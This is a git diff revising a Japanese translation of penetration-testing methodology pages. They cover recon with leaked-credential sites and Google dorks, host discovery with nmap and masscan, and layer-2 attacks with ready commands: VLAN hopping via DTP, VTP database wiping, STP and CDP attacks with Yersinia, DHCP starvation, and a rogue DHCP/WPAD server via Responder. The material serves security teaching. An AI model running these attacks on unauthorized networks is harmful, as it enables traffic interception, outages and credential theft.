-メールは、**ウェブログインや認証サービス**(SSHなど)を**ブルートフォース**する際に役立ちます。また、**フィッシング**にも必要です。さらに、これらのAPIは、メールの背後にいる**人物に関するさらなる情報**を提供してくれます。これはフィッシングキャンペーンに役立ちます。 +メールは、**ウェブログインや認証サービス**(SSHなど)を**ブルートフォース**する際に役立ちます。また、**フィッシング**にも必要です。さらに、これらのAPIは、メールの背後にいる**人物に関するさらなる情報**を提供してくれるため、フィッシングキャンペーンに役立ちます。 ## 資格情報の漏洩 -**ドメイン、** **サブドメイン、** **メール**を使用して、過去に漏洩した資格情報を探し始めることができます: +**ドメイン、** **サブドメイン、** **メール**を持っているので、過去に漏洩したそのメールに関連する資格情報を探し始めることができます: - [https://leak-lookup.com](https://leak-lookup.com/account/login) - [https://www.dehashed.com/](https://www.dehashed.com/) @@ -546,7 +546,7 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a ## 秘密の漏洩 -資格情報の漏洩は、**機密情報が漏洩して販売された**企業のハッキングに関連しています。ただし、企業は、これらのデータベースに情報がない**他の漏洩**の影響を受ける可能性があります: +資格情報の漏洩は、**機密情報が漏洩し販売された**企業のハッキングに関連しています。しかし、企業は、これらのデータベースに情報がない**他の漏洩**の影響を受ける可能性があります: ### Githubの漏洩 @@ -566,13 +566,13 @@ github-leaked-secrets.md ### Pasteの漏洩 時には攻撃者や単なる従業員が**会社のコンテンツをペーストサイトに公開**します。これには**機密情報**が含まれている場合もあれば、含まれていない場合もありますが、検索するのは非常に興味深いです。\ -[**Pastos**](https://github.com/carlospolop/Pastos)というツールを使用して、80以上のペーストサイトを同時に検索できます。 +**Pastos**というツールを使用して、80以上のペーストサイトで同時に検索できます。 ### Google Dorks -古くても金の価値があるGoogle Dorksは、**そこにあるべきでない情報を見つける**のに常に役立ちます。唯一の問題は、[**google-hacking-database**](https://www.exploit-db.com/google-hacking-database)に、手動で実行できない**数千**の可能なクエリが含まれていることです。したがって、お気に入りの10個を取得するか、[**Gorks**](https://github.com/carlospolop/Gorks)のような**ツールを使用してすべてを実行**することができます。 +古くても金の価値があるGoogle Dorksは、**そこにあるべきでない情報を見つける**のに常に役立ちます。唯一の問題は、[**google-hacking-database**](https://www.exploit-db.com/google-hacking-database)に、手動で実行できない**数千**の可能なクエリが含まれていることです。したがって、お気に入りの10個を取得するか、**[**Gorks**](https://github.com/carlospolop/Gorks)**のようなツールを使用してすべてを実行することができます。** -_すべてのデータベースを通常のGoogleブラウザを使用して実行しようとするツールは、非常に早くGoogleにブロックされるため、決して終わらないことに注意してください。_ +_すべてのデータベースを通常のGoogleブラウザを使用して実行しようとするツールは、Googleが非常に早くブロックするため、決して終わらないことに注意してください。_ ### **脆弱性の検索** @@ -580,7 +580,7 @@ _すべてのデータベースを通常のGoogleブラウザを使用して実 ## 公開コードの脆弱性 -企業が**オープンソースコード**を持っていることがわかった場合、それを**分析**して**脆弱性**を探すことができます。 +企業が**オープンソースコード**を持っている場合、それを**分析**して**脆弱性**を探すことができます。 **言語によって**異なる**ツール**を使用できます: @@ -594,24 +594,24 @@ _すべてのデータベースを通常のGoogleブラウザを使用して実 ## [**ウェブペンテスト手法**](../../network-services-pentesting/pentesting-web/index.html) -**バグハンター**によって見つかった**脆弱性の大部分**は**ウェブアプリケーション**内に存在するため、この時点で**ウェブアプリケーションテスト手法**について話したいと思います。詳細は[**こちらで確認できます**](../../network-services-pentesting/pentesting-web/index.html)。 +**バグハンターによって見つけられる脆弱性の大多数**は**ウェブアプリケーション**内に存在するため、この時点で**ウェブアプリケーションテスト手法**について話したいと思います。詳細は[**こちらで確認できます**](../../network-services-pentesting/pentesting-web/index.html)。 -また、[**オープンソースツールのウェブ自動スキャナー**](../../network-services-pentesting/pentesting-web/index.html#automatic-scanners)のセクションにも特別な言及をしたいと思います。非常に機密性の高い脆弱性を見つけることを期待すべきではありませんが、**初期のウェブ情報を得るためのワークフローに役立ちます。** +また、[**オープンソースツールのウェブ自動スキャナー**](../../network-services-pentesting/pentesting-web/index.html#automatic-scanners)のセクションにも特別な言及をしたいと思います。非常に機密性の高い脆弱性を見つけることを期待すべきではありませんが、**初期のウェブ情報を得るためのワークフローに実装するのに役立ちます。** ## 再確認 -> おめでとうございます!この時点で、**すべての基本的な列挙**をすでに実行しています。はい、これは基本的なもので、さらに多くの列挙が可能です(後でさらにトリックを見ていきます)。 +> おめでとうございます!この時点で、**すべての基本的な列挙**を実行しました。はい、これは基本的なもので、さらに多くの列挙が可能です(後でさらにトリックを見ていきます)。 -したがって、すでに次のことを行っています: +したがって、すでに以下を行いました: 1. スコープ内のすべての**企業**を見つけた 2. 企業に属するすべての**資産**を見つけた(スコープ内で脆弱性スキャンを実行) 3. 企業に属するすべての**ドメイン**を見つけた -4. ドメインのすべての**サブドメイン**を見つけた(サブドメインの乗っ取りはありますか?) +4. ドメインのすべての**サブドメイン**を見つけた(サブドメインの乗っ取りは?) 5. スコープ内のすべての**IP**(CDNからのものとそうでないもの)を見つけた -6. すべての**ウェブサーバー**を見つけ、**スクリーンショット**を撮った(深く見る価値のある奇妙なものはありますか?) +6. すべての**ウェブサーバー**を見つけ、**スクリーンショット**を撮った(深く見る価値のある奇妙なものは?) 7. 企業に属するすべての**潜在的なパブリッククラウド資産**を見つけた -8. **メール**、**資格情報の漏洩**、および**秘密の漏洩**があり、**非常に簡単に大きな勝利**を得ることができる +8. **メール**、**資格情報の漏洩**、および**秘密の漏洩**があり、**非常に簡単に大きな勝利を得ることができる** 9. 見つけたすべてのウェブを**ペンテスト** ## **フルリコン自動ツール** diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md index 9f90ab112..720336b67 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/README.md +++ b/src/generic-methodologies-and-resources/pentesting-network/README.md @@ -12,8 +12,8 @@ ### ICMP これは、ホストが稼働しているかどうかを発見するための**最も簡単**で**最速**な方法です。\ -いくつかの**ICMP**パケットを送信し、**応答を期待**することができます。最も簡単な方法は、**エコーリクエスト**を送信し、応答を期待することです。これを単純な`ping`を使用するか、**範囲**のために`fping`を使用して行うことができます。\ -また、**nmap**を使用して他のタイプのICMPパケットを送信することもできます(これにより、一般的なICMPエコーリクエスト-応答に対するフィルターを回避できます)。 +いくつかの**ICMP**パケットを送信し、**応答を期待**することができます。最も簡単な方法は、**エコーリクエスト**を送信し、応答を期待することです。これを単純な `ping` を使用するか、**範囲**のために `fping` を使用して行うことができます。\ +また、**nmap**を使用して他のタイプのICMPパケットを送信することもできます(これにより、一般的なICMPエコーリクエスト-応答のフィルターを回避できます)。 ```bash ping -c 1 199.66.11.4 # 1 echo request to a host fping -g 199.66.11.0/24 # Send echo requests to ranges @@ -21,23 +21,23 @@ nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet ``` ### TCPポート発見 -あらゆる種類のICMPパケットがフィルタリングされていることが非常に一般的です。そのため、ホストが稼働しているかどうかを確認するためにできることは、**オープンポートを見つけること**だけです。各ホストには**65535ポート**がありますので、「大きな」スコープがある場合、各ホストの**各ポート**がオープンかどうかをテストすることは**できません**。それにはあまりにも多くの時間がかかります。\ +あらゆる種類のICMPパケットがフィルタリングされていることが非常に一般的です。そのため、ホストが稼働しているかどうかを確認するためにできることは、**オープンポートを見つけること**です。各ホストには**65535ポート**がありますので、「大きな」スコープがある場合、各ホストの**各ポート**がオープンかどうかをテストすることは**できません**。それにはあまりにも多くの時間がかかります。\ そのため、必要なのは**高速ポートスキャナー**([masscan](https://github.com/robertdavidgraham/masscan))と、**最も使用されるポートのリスト**です: ```bash #Using masscan to scan top20ports of nmap in a /24 range (less than 5min) masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24 ``` -このステップは `nmap` を使っても実行できますが、遅く、`nmap` はホストの識別に問題があります。 +`nmap`を使ってこのステップを実行することもできますが、遅く、`nmap`はホストの識別に問題があります。 -### HTTP ポート発見 +### HTTPポート発見 -これは、**HTTP** **サービス** の発見に焦点を当てたいときに便利な TCP ポート発見です: +これは、**HTTP** **サービス**の発見に焦点を当てたいときに便利なTCPポート発見です: ```bash masscan -p80,443,8000-8100,8443 199.66.11.0/24 ``` ### UDPポート発見 -いくつかの**UDPポートが開いている**かどうかを確認して、**ホストにもっと注意を払う**べきかを判断することもできます。UDPサービスは通常、通常の空のUDPプローブパケットに**データ**で**応答しない**ため、ポートがフィルタリングされているのか開いているのかを判断するのは難しいです。これを判断する最も簡単な方法は、実行中のサービスに関連するパケットを送信することであり、どのサービスが実行されているかわからないため、ポート番号に基づいて最も可能性の高いものを試すべきです: +いくつかの**UDPポートが開いている**かどうかを確認して、**ホストにもっと注意を払うべきか**を判断することもできます。UDPサービスは通常、通常の空のUDPプローブパケットに**データを返さない**ため、ポートがフィルタリングされているのか開いているのかを判断するのは難しいです。これを判断する最も簡単な方法は、実行中のサービスに関連するパケットを送信することであり、どのサービスが実行されているかわからないため、ポート番号に基づいて最も可能性の高いものを試すべきです: ```bash nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24 # The -sV will make nmap test each possible known UDP service packet @@ -60,7 +60,7 @@ nmap -T4 -sY -n --open -Pn ## 内部からのホストの発見 -ネットワーク内にいる場合、最初に行いたいことの一つは**他のホストを発見すること**です。**どれだけのノイズ**を出すことができるか/したいかによって、異なるアクションを実行できます: +ネットワーク内にいる場合、最初に行いたいことの一つは**他のホストを発見すること**です。**どれだけのノイズ**を出すことができるか/出したいかによって、異なるアクションを実行できます: ### パッシブ @@ -109,7 +109,7 @@ alive6 # Send a pingv6 to multicast. Wake On Lanは、**ネットワークメッセージ**を通じてコンピュータを**起動する**ために使用されます。コンピュータを起動するために使用されるマジックパケットは、**MAC Dst**が提供され、その後同じパケット内で**16回繰り返される**だけのパケットです。\ この種のパケットは通常、**イーサネット0x0842**または**ポート9へのUDPパケット**で送信されます。\ -**\[MAC]**が提供されていない場合、パケットは**ブロードキャストイーサネット**に送信され(ブロードキャストMACが繰り返されるものになります)。 +**[MAC]**が提供されていない場合、パケットは**ブロードキャストイーサネット**に送信され(ブロードキャストMACが繰り返されることになります)。 ```bash # Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain) wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847 @@ -170,19 +170,21 @@ nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan ``` ### IDSとIPSの回避 + {{#ref}} ids-evasion.md {{#endref}} ### **より多くのnmapオプション** + {{#ref}} nmap-summary-esp.md {{#endref}} ### 内部IPアドレスの明示 -**誤設定されたルーター、ファイアウォール、ネットワークデバイス**は、**非公開のソースアドレス**を使用してネットワークプローブに応答することがあります。**tcpdump**を利用して、テスト中にプライベートアドレスから受信したパケットを特定できます。具体的には、Kali Linux上で、**eth2インターフェース**でパケットをキャプチャできます。あなたのセットアップがNATまたはファイアウォールの背後にある場合、そのようなパケットはフィルタリングされる可能性が高いことに注意することが重要です。 +**誤設定されたルーター、ファイアウォール、ネットワークデバイス**は、**非公開のソースアドレス**を使用してネットワークプローブに応答することがあります。**tcpdump**を利用して、テスト中にプライベートアドレスから受信したパケットを特定できます。具体的には、Kali Linuxでは、**eth2インターフェース**上でパケットをキャプチャできます。インターネットからアクセス可能です。NATやファイアウォールの背後にセットアップがある場合、そのようなパケットはフィルタリングされる可能性が高いことに注意が必要です。 ```bash tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode @@ -192,7 +194,7 @@ IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64 ``` ## スニッフィング -スニッフィングでは、キャプチャされたフレームやパケットをレビューすることで、IPレンジ、サブネットサイズ、MACアドレス、およびホスト名の詳細を学ぶことができます。ネットワークが誤って構成されている場合やスイッチングファブリックがストレス下にある場合、攻撃者はパッシブネットワークスニッフィングを通じて機密情報をキャプチャすることができます。 +スニッフィングでは、キャプチャされたフレームやパケットをレビューすることで、IPレンジ、サブネットサイズ、MACアドレス、およびホスト名の詳細を学ぶことができます。ネットワークが誤って構成されている場合や、スイッチングファブリックがストレス下にある場合、攻撃者はパッシブネットワークスニッフィングを通じて機密情報をキャプチャすることができます。 スイッチされたイーサネットネットワークが適切に構成されている場合、ブロードキャストフレームとあなたのMACアドレス宛てのデータのみが表示されます。 @@ -256,11 +258,11 @@ macof -i #### ダイナミックトランク -**ダイナミックトランクプロトコル (DTP)** は、トランクの自動システムを促進するために設計されたリンク層プロトコルであり、スイッチがトランクモード(Trunk)または非トランクモードのポートを自動的に選択できるようにします。**DTP** の展開は、しばしば最適でないネットワーク設計の指標と見なされ、必要な場合にのみ手動でトランクを構成し、適切な文書化を確保することの重要性を強調します。 +**ダイナミックトランクプロトコル (DTP)** は、トランクを自動的に選択するためのリンク層プロトコルとして設計されており、スイッチがトランクモード(Trunk)または非トランクモードを自動的に選択できるようにします。**DTP** の展開は、しばしば最適でないネットワーク設計の指標と見なされ、必要な場合にのみ手動でトランクを構成し、適切な文書化を確保することの重要性を強調します。 デフォルトでは、スイッチポートはダイナミックオートモードで動作するように設定されており、隣接するスイッチからの要求があればトランクを開始する準備が整っています。セキュリティ上の懸念は、ペンテスターまたは攻撃者がスイッチに接続し、DTP Desirableフレームを送信してポートをトランクモードに強制する場合に生じます。このアクションにより、攻撃者はSTPフレーム分析を通じてVLANを列挙し、仮想インターフェースを設定することでVLANセグメンテーションを回避できます。 -多くのスイッチにデフォルトでDTPが存在することは、敵がスイッチの動作を模倣し、すべてのVLANのトラフィックにアクセスすることを可能にします。スクリプト[_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan)は、インターフェースを監視し、スイッチがデフォルト、トランク、ダイナミック、オート、またはアクセスポートモードのいずれにあるかを明らかにします。アクセスポートモードのみがVLANホッピング攻撃に対して免疫を持つ構成です。このツールは、スイッチの脆弱性状態を評価します。 +多くのスイッチにデフォルトでDTPが存在することは、敵がスイッチの動作を模倣し、すべてのVLANのトラフィックにアクセスすることを可能にします。スクリプト[_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan)は、インターフェースを監視し、スイッチがデフォルト、トランク、ダイナミック、オート、またはアクセスポートモードのいずれにあるかを明らかにします。アクセスポートモードはVLANホッピング攻撃に対して唯一免疫のある構成です。このツールは、スイッチの脆弱性状態を評価します。 ネットワークの脆弱性が特定された場合、_**Yersinia**_ツールを使用してDTPプロトコルを介して「トランクを有効にする」ことができ、すべてのVLANからのパケットを観察することが可能になります。 ```bash @@ -279,7 +281,7 @@ VLANを列挙するために、スクリプト[**DTPHijacking.py**](https://gith ``` sudo python3 DTPHijacking.py --interface eth0 ``` -**Access/Desirable (0x03)**は、DTPフレームがDesirableタイプであることを示し、ポートにTrunkモードに切り替えるよう指示します。また、**802.1Q/802.1Q (0xa5)**は、**802.1Q**カプセル化タイプを示します。 +私は**Access/Desirable (0x03)**がDTPフレームがDesirableタイプであることを示し、ポートにTrunkモードに切り替えるよう指示することを指摘したいと思います。また、**802.1Q/802.1Q (0xa5)**は**802.1Q**カプセル化タイプを示します。 STPフレームを分析することで、**VLAN 30とVLAN 60の存在について学びます。** @@ -323,13 +325,13 @@ sudo dhclient -v eth0.30 ``` #### Automatic VLAN Hopper -議論された攻撃である**Dynamic Trunkingと仮想インターフェースの作成、他のVLAN内のホストの発見**は、ツールによって**自動的に実行されます**: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger) +議論された攻撃である**Dynamic Trunkingと仮想インターフェースを作成し、他のVLAN内のホストを発見する**は、ツールによって**自動的に実行されます**: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger) #### Double Tagging 攻撃者が**被害者ホストのMAC、IP、およびVLAN IDの値**を知っている場合、彼は**フレームをダブルタグ**し、指定されたVLANと被害者のVLANでパケットを送信しようとすることができます。**被害者は攻撃者と接続できないため、攻撃者にとって最良の選択肢はUDPを介して通信すること**です。これにより、いくつかの興味深いアクションを実行できるプロトコル(SNMPなど)と通信できます。 -攻撃者の別のオプションは、**攻撃者が制御し、被害者がアクセス可能なIPを偽装してTCPポートスキャンを実行すること**です(おそらくインターネットを介して)。その後、攻撃者は、被害者からのパケットを受信した場合、彼が所有する2番目のホストでスニッフィングを行うことができます。 +攻撃者の別のオプションは、**攻撃者が制御し、被害者がアクセス可能なIPを偽装してTCPポートスキャンを実行する**ことです(おそらくインターネットを介して)。その後、攻撃者は、被害者からのパケットを受信した場合、彼が所有する2番目のホストでスニッフィングを行うことができます。 ![](<../../images/image (190).png>) @@ -350,38 +352,38 @@ lateral-vlan-segmentation-bypass.md #### Layer 3 Private VLAN Bypass -ゲスト無線ネットワークなどの特定の環境では、**ポートアイソレーション(プライベートVLANとも呼ばれる)**設定が実装され、無線アクセスポイントに接続されたクライアント同士が直接通信するのを防ぎます。しかし、これらのアイソレーション対策を回避できる技術が特定されています。この技術は、ネットワークACLの欠如または不適切な構成を利用し、IPパケットがルーターを通じて同じネットワーク上の別のクライアントにルーティングされることを可能にします。 +特定の環境、例えばゲスト無線ネットワークでは、**ポートアイソレーション(プライベートVLANとも呼ばれる)**設定が実装され、無線アクセスポイントに接続されたクライアント同士が直接通信できないようにされています。しかし、これらのアイソレーション対策を回避できる技術が特定されています。この技術は、ネットワークACLの欠如または不適切な設定を利用し、IPパケットがルーターを通じて同じネットワーク内の別のクライアントにルーティングされることを可能にします。 攻撃は、**宛先クライアントのIPアドレスを持ち、ルーターのMACアドレスを持つパケットを作成することによって実行されます**。これにより、ルーターはパケットをターゲットクライアントに誤って転送します。このアプローチは、被害者にアクセス可能なホストを制御する能力を利用してセキュリティの欠陥を悪用するダブルタグ攻撃で使用されるものに似ています。 -**攻撃の主要なステップ:** +**攻撃の主要なステップ:** -1. **パケットの作成:** ターゲットクライアントのIPアドレスを含むように特別に作成されたパケットを作成しますが、ルーターのMACアドレスを使用します。 -2. **ルーターの動作を悪用:** 作成されたパケットがルーターに送信され、構成によりパケットがターゲットクライアントにリダイレクトされ、プライベートVLAN設定によるアイソレーションをバイパスします。 +1. **パケットの作成:** ターゲットクライアントのIPアドレスを含むように特別に作成されたパケットを作成しますが、ルーターのMACアドレスを使用します。 +2. **ルーターの動作を悪用:** 作成されたパケットはルーターに送信され、設定によりパケットがターゲットクライアントにリダイレクトされ、プライベートVLAN設定によるアイソレーションをバイパスします。 ### VTP Attacks -VTP(VLANトランキングプロトコル)はVLAN管理を集中化します。VLANデータベースの整合性を維持するためにリビジョン番号を利用し、変更があるとこの番号が増加します。スイッチは、より高いリビジョン番号の構成を採用し、自身のVLANデータベースを更新します。 +VTP(VLANトランキングプロトコル)はVLAN管理を集中化します。VLANデータベースの整合性を維持するためにリビジョン番号を利用し、変更があるとこの番号が増加します。スイッチは、より高いリビジョン番号の設定を採用し、自身のVLANデータベースを更新します。 #### VTP Domain Roles -- **VTPサーバー:** VLANを管理します—作成、削除、変更します。ドメインメンバーにVTPアナウンスをブロードキャストします。 -- **VTPクライアント:** VTPアナウンスを受信し、自身のVLANデータベースを同期します。この役割はローカルVLAN構成の変更が制限されています。 -- **VTPトランスペアレント:** VTP更新に関与せず、VTPアナウンスを転送します。VTP攻撃の影響を受けず、リビジョン番号は常にゼロのままです。 +- **VTPサーバー:** VLANを管理します—作成、削除、変更を行います。ドメインメンバーにVTPアナウンスをブロードキャストします。 +- **VTPクライアント:** VTPアナウンスを受信し、自身のVLANデータベースを同期します。この役割はローカルVLAN設定の変更が制限されています。 +- **VTPトランスペアレント:** VTP更新に関与せず、VTPアナウンスを転送します。VTP攻撃の影響を受けず、リビジョン番号は常にゼロのままです。 #### VTP Advertisement Types -- **サマリーアナウンス:** VTPサーバーによって300秒ごとにブロードキャストされ、重要なドメイン情報を運びます。 -- **サブセットアナウンス:** VLAN構成変更後に送信されます。 -- **アナウンスリクエスト:** VTPクライアントによってサマリーアナウンスを要求するために発行され、通常はより高い構成リビジョン番号を検出した際に行われます。 +- **サマリーアナウンス:** VTPサーバーによって300秒ごとにブロードキャストされ、重要なドメイン情報を含みます。 +- **サブセットアナウンス:** VLAN設定変更後に送信されます。 +- **アナウンスリクエスト:** VTPクライアントによってサマリーアナウンスを要求するために発行され、通常はより高い設定リビジョン番号を検出した際に行われます。 VTPの脆弱性は、VTPアナウンスがトランクポートを通じてのみ循環するため、トランクポートを介してのみ悪用可能です。DTP攻撃後のシナリオはVTPに移行する可能性があります。Yersiniaのようなツールは、VLANデータベースを消去し、ネットワークを効果的に混乱させることを目的としたVTP攻撃を支援できます。 -注意:この議論はVTPバージョン1(VTPv1)に関するものです。 +注意: この議論はVTPバージョン1(VTPv1)に関するものです。 ````bash %% yersinia -G # Launch Yersinia in graphical mode ``` ```` -Yersiniaのグラフィカルモードで、VLANデータベースを削除するためにすべてのVTP VLANを削除するオプションを選択します。 +Yersiniaのグラフィカルモードでは、VLANデータベースを削除するためにすべてのVTP VLANを削除するオプションを選択します。 ### STP攻撃 @@ -397,14 +399,14 @@ yersinia stp -attack 3 ``` #### **STP TCP攻撃** -TCPが送信されると、スイッチのCAMテーブルは15秒で削除されます。その後、この種のパケットを継続的に送信していると、CAMテーブルは継続的に(または15秒ごとに)再起動され、再起動されるとスイッチはハブのように動作します。 +TCPが送信されると、スイッチのCAMテーブルは15秒で削除されます。その後、この種のパケットを継続的に送信している場合、CAMテーブルは継続的に(または15秒ごとに)再起動され、再起動されるとスイッチはハブのように動作します。 ```bash yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen ``` #### **STPルート攻撃** -攻撃者はスイッチの動作を模倣してネットワークのSTPルートになります。これにより、より多くのデータが彼を通過します。これは、2つの異なるスイッチに接続されているときに興味深いです。\ +攻撃者はスイッチの動作を模倣してネットワークのSTPルートになります。これにより、より多くのデータが彼を通過します。これは、異なる2つのスイッチに接続されているときに興味深いです。\ これは、実際のルートスイッチの実際の優先度よりも**優先度**値が低いと伝えるBPDUs CONFパケットを送信することによって行われます。 ```bash yersinia stp -attack 4 #Behaves like the root switch @@ -417,11 +419,11 @@ ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpack ``` ### CDP攻撃 -CISCO Discovery Protocol (CDP) は、CISCOデバイス間の通信に不可欠であり、デバイスが**互いを識別し、設定の詳細を共有する**ことを可能にします。 +CISCO Discovery Protocol (CDP)は、CISCOデバイス間の通信に不可欠であり、デバイスが**互いを識別し、設定詳細を共有する**ことを可能にします。 #### パッシブデータ収集 -CDPはすべてのポートを通じて情報をブロードキャストするように設定されており、これがセキュリティリスクにつながる可能性があります。攻撃者はスイッチポートに接続すると、**Wireshark**、**tcpdump**、または**Yersinia**のようなネットワークスニファーを展開することができます。この行動は、ネットワークデバイスに関する機密データ、例えばそのモデルや実行中のCisco IOSのバージョンを明らかにする可能性があります。攻撃者は、特定のCisco IOSバージョンに存在する脆弱性をターゲットにするかもしれません。 +CDPはすべてのポートを通じて情報をブロードキャストするように設定されており、これがセキュリティリスクにつながる可能性があります。攻撃者はスイッチポートに接続すると、**Wireshark**、**tcpdump**、または**Yersinia**のようなネットワークスニファーを展開することができます。この行動は、ネットワークデバイスに関する機密データ、例えばそのモデルや実行中のCisco IOSのバージョンを明らかにする可能性があります。攻撃者は、特定のCisco IOSバージョンにおける脆弱性をターゲットにするかもしれません。 #### CDPテーブルフラッディングの誘発 @@ -446,22 +448,22 @@ VoIP電話は、IoTデバイスとますます統合されており、特別な ツール[**voiphopper**](http://voiphopper.sourceforge.net)は、さまざまな環境(Cisco、Avaya、Nortel、Alcatel-Lucent)でVoIP電話をエミュレートするように設計されています。CDP、DHCP、LLDP-MED、802.1Q ARPなどのプロトコルを使用して、音声ネットワークのVLAN IDを発見します。 -**VoIP Hopper**は、Cisco Discovery Protocol (CDP)のための3つのモードを提供します: +**VoIP Hopper**は、Cisco Discovery Protocol(CDP)用に3つのモードを提供します: -1. **スニフモード** (`-c 0`): ネットワークパケットを分析してVLAN IDを特定します。 -2. **スプーフモード** (`-c 1`): 実際のVoIPデバイスのパケットを模倣したカスタムパケットを生成します。 -3. **事前作成パケットモード** (`-c 2`): 特定のCisco IP電話モデルのパケットと同一のパケットを送信します。 +1. **スニフモード**(`-c 0`):ネットワークパケットを分析してVLAN IDを特定します。 +2. **スプーフモード**(`-c 1`):実際のVoIPデバイスのパケットを模倣したカスタムパケットを生成します。 +3. **事前作成パケットモード**(`-c 2`):特定のCisco IP電話モデルのパケットと同一のパケットを送信します。 -速度のために推奨されるモードは3番目です。以下を指定する必要があります: +速度のために推奨されるモードは3番目です。次のことを指定する必要があります: - 攻撃者のネットワークインターフェース(`-i`パラメータ)。 - エミュレートされるVoIPデバイスの名前(`-E`パラメータ)、Ciscoの命名形式(例:SEPの後にMACアドレス)に従います。 -企業環境では、既存のVoIPデバイスを模倣するために、次のようにすることがあります: +企業環境では、既存のVoIPデバイスを模倣するために、次のことを行うことがあります: -- 電話のMACラベルを確認します。 -- 電話のディスプレイ設定をナビゲートしてモデル情報を表示します。 -- VoIPデバイスをラップトップに接続し、Wiresharkを使用してCDPリクエストを観察します。 +- 電話のMACラベルを確認する。 +- 電話のディスプレイ設定をナビゲートしてモデル情報を表示する。 +- VoIPデバイスをラップトップに接続し、Wiresharkを使用してCDPリクエストを観察する。 ツールを3番目のモードで実行するためのコマンドの例は次のとおりです: ```bash @@ -499,24 +501,24 @@ yersinia dhcp -attack 3 #More parameters are needed ``` より自動化された方法は、ツール [DHCPing](https://github.com/kamorin/DHCPig) を使用することです。 -前述のDoS攻撃を使用して、クライアントが環境内で新しいリースを取得するよう強制し、正当なサーバーを枯渇させて応答しなくすることができます。したがって、正当なサーバーが再接続を試みるときに、**次の攻撃で言及される悪意のある値を提供できます**。 +前述のDoS攻撃を使用して、クライアントが環境内で新しいリースを取得するよう強制し、正当なサーバーを枯渇させて応答しなくすることができます。正当なサーバーが再接続しようとするときに、**次の攻撃で言及されている悪意のある値を提供できます**。 #### 悪意のある値を設定する -不正なDHCPサーバーは、`/usr/share/responder/DHCP.py` にあるDHCPスクリプトを使用して設定できます。これは、トラフィックを悪意のあるサーバーにリダイレクトすることによって、HTTPトラフィックや認証情報をキャプチャするようなネットワーク攻撃に役立ちます。ただし、不正なゲートウェイを設定することは、クライアントからのアウトバウンドトラフィックのみをキャプチャするため、実際のゲートウェイからの応答を見逃すため、効果が薄いです。代わりに、不正なDNSまたはWPADサーバーを設定することが推奨されます。 +不正なDHCPサーバーは、`/usr/share/responder/DHCP.py`にあるDHCPスクリプトを使用して設定できます。これは、トラフィックを悪意のあるサーバーにリダイレクトすることによって、HTTPトラフィックや認証情報をキャプチャするためのネットワーク攻撃に役立ちます。ただし、不正なゲートウェイを設定することは、クライアントからのアウトバウンドトラフィックのみをキャプチャするため、実際のゲートウェイからの応答を見逃すため、効果が薄いです。代わりに、不正なDNSまたはWPADサーバーを設定することが推奨されます。 以下は、不正なDHCPサーバーを構成するためのコマンドオプションです: -- **私たちのIPアドレス(ゲートウェイ広告)**: `-i 10.0.0.100` を使用して、あなたのマシンのIPをゲートウェイとして広告します。 -- **ローカルDNSドメイン名**: オプションで、`-d example.org` を使用してローカルDNSドメイン名を設定します。 -- **元のルーター/ゲートウェイIP**: `-r 10.0.0.1` を使用して、正当なルーターまたはゲートウェイのIPアドレスを指定します。 -- **プライマリDNSサーバーIP**: `-p 10.0.0.100` を使用して、あなたが制御する不正なDNSサーバーのIPアドレスを設定します。 -- **セカンダリDNSサーバーIP**: オプションで、`-s 10.0.0.1` を使用してセカンダリDNSサーバーのIPを設定します。 -- **ローカルネットワークのネットマスク**: `-n 255.255.255.0` を使用して、ローカルネットワークのネットマスクを定義します。 -- **DHCPトラフィック用インターフェース**: `-I eth1` を使用して、特定のネットワークインターフェースでDHCPトラフィックをリッスンします。 -- **WPAD構成アドレス**: `-w “http://10.0.0.100/wpad.dat”` を使用して、ウェブトラフィックの傍受を支援するWPAD構成のアドレスを設定します。 -- **デフォルトゲートウェイIPを偽装**: `-S` を含めて、デフォルトゲートウェイのIPアドレスを偽装します。 -- **すべてのDHCPリクエストに応答**: `-R` を含めて、サーバーがすべてのDHCPリクエストに応答するようにしますが、これはノイジーで検出される可能性があることに注意してください。 +- **私たちのIPアドレス(ゲートウェイ広告)**: `-i 10.0.0.100`を使用して、あなたのマシンのIPをゲートウェイとして広告します。 +- **ローカルDNSドメイン名**: オプションで、`-d example.org`を使用してローカルDNSドメイン名を設定します。 +- **元のルーター/ゲートウェイIP**: `-r 10.0.0.1`を使用して、正当なルーターまたはゲートウェイのIPアドレスを指定します。 +- **プライマリDNSサーバーIP**: `-p 10.0.0.100`を使用して、あなたが制御する不正なDNSサーバーのIPアドレスを設定します。 +- **セカンダリDNSサーバーIP**: オプションで、`-s 10.0.0.1`を使用してセカンダリDNSサーバーのIPを設定します。 +- **ローカルネットワークのネットマスク**: `-n 255.255.255.0`を使用して、ローカルネットワークのネットマスクを定義します。 +- **DHCPトラフィック用インターフェース**: `-I eth1`を使用して、特定のネットワークインターフェースでDHCPトラフィックをリッスンします。 +- **WPAD構成アドレス**: `-w “http://10.0.0.100/wpad.dat”`を使用して、ウェブトラフィックの傍受を支援するWPAD構成のアドレスを設定します。 +- **デフォルトゲートウェイIPを偽装**: `-S`を含めて、デフォルトゲートウェイのIPアドレスを偽装します。 +- **すべてのDHCPリクエストに応答**: `-R`を含めて、サーバーがすべてのDHCPリクエストに応答するようにしますが、これはノイジーで検出される可能性があることに注意してください。 